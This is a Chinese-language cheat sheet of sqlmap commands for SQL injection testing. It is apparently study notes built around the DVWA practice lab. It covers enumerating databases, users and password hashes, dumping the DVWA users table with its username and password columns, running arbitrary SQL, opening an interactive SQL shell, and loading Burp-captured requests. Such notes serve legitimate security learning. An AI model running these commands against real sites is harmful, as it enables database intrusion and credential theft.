先安装python,再将sqlmap的解压文件复制到python根目录中
windows下 sqlmap主要命令
python sqlmap.py -h //查看帮助信息
python sqlmap.py -u "url" //get注入
python sqlmap.py -u "url" --data "表单数据" //post注入,data直接复制bp里面的数据
python sqlmap.py -u "url" --cookie="session=123132;name1=234" //修改请求cookie
python sqlmap.py -u "url" --dbs //列出所有数据库名
python sqlmap.py -u "url" --users //列用户
python sqlmap.py -u "url" --passwords //
python sqlmap.py -u "url" --tables -D DB_NAME //列DB_NAME的表
python sqlmap.py -u "url" --columns -T TB_NAME -D DB_NAME //读取TB_NAME中的列
--current-user检索DBMS当前用户
--current-db检索DBMS当前数据库
--hostname检索DBMS服务器主机名
--is-dba探测DBMS当前用户是不是DBA权限(最高权限)
-–users枚举DBMS用户 获得数据库的所有用户
--passwords枚举DBMS用户密码hashes值 获得数据库用户的密码的hashes值
-–privileges枚举DBMS用户权限 -可见root用户的权限最高,执行的操作最多。
-–roles枚举DBMS用户角色
--dbs枚举DBMS数据库 获得当前可用的数据库
--tables枚举DBMS所有数据库表 直接得到所有不同数据库下面的表
--columns枚举DBMS所有数据库表的列
–-schema枚举数据库模式 就是ID int()
--count检索表的项数目
--dump转出数据库表的映射表项目
-D 指定数据库
格式:
python sqlmap.py -u "url" --cookie "cookie数据" -D dvwa --tables
获得指定数据库所有表信息
-T指定表
格式:
python sqlmap.py -u "url" --cookie "cookie数据" -D dvwa -T users --columns
获得指定数据库和表中的所有列名字信息
-C指定列获得信息
格式:
python sqlmap.py -u "url" --cookie "cookie数据" -D dvwa -T users --dump
python sqlmap.py -u "url" --cookie "cookie数据" -D dvwa -T users -C username,password --dump
获得指定数据库指定表指定列名数据
-X枚举DBMS数据库列的时候排除某个列
格式:
python sqlmap.py -u "url" --cookie "cookie数据" -D dvwa -T users -X password --dump
除了password都出来了
--sql-query=QUERY执行sql语句
格式:
python sqlmap.py -u "url" --cookie "cookie数据" --sql-query="select * from users;"
执行了一个说起来查询语句,并且获得了信息。
--sql-shell提供一个交互式界面
python sqlmap.py -u "url" --cookie "cookie数据" --sql-shell
如果对懒得对命令行构造参数,可以通过将POST请求保存成文件,sqlmap支持从文件读取POST请求来进行注入测试。
文件方式对单个POST注入:
通过burp suite工具拦截到请求中将POST保存成文件
使用-r参数读取POST进行测试
sqlmap.py -r C:\Users\l00109379\Desktop\抽验\sqlmap\opr.txt -v 3
-r参数就是用于指定具体的待测试的文件。